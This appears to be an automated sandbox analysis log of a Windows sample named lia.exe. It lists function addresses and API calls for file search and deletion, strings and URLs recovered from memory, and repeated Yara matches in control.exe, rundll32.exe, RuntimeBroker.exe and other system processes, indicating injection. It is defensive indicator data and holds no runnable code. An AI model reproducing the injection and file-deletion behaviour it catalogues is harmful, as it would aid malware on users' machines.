Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 0000000C.00000003.487223074.000001777B372000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmg |
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/ |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000000C.00000002.572331191.0000017700001000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp | String found in binary or memory: http://twitter.com/spotifyg |
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: explorer.exe, 00000016.00000000.543937069.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495631696.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527688751.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR |
Source: Yara match | File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B16DD3 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B17F60 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B16B67 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E63BC |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EA241 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D95FE |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EF1EE |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D9D64 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DC086 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D34DC |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E78F1 |
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039D504A |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054AB44 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054B58C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005386D0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00549858 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00532804 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053A808 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053B008 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00548820 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00538024 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00535828 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005268FC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005340E8 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00523890 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00524080 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00545954 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052B154 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053194B |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005231D4 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00536190 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005352CC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005212BC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00542330 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00537BFC |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00542BA0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00523BA4 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053BC10 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052C49C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005344B4 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052DCA8 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053CCA8 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00530544 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00547D6C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053751C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00544530 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00529DF0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0054C588 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00548DA0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00531618 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00543E2C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052A6D0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00547EA0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00539740 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0052CF44 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_0053FF4C |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00527F64 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_005437D0 |
Source: C:\Windows\System32\control.exe | Code function: 18_2_00548FA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F86D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F480AB44 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4808820 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E3BA4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4809858 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4802BA0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4808FA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F5828 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F8024 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F48037D0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FBC10 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FB008 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FA808 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F2804 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F7BFC |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F40E8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4804530 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F44B4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47EDCA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47EC49C |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4805954 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E3890 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47E4080 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F4807D6C |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47EB154 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F194B |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F0544 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47FCCA8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 34_2_00000215F47F751C |
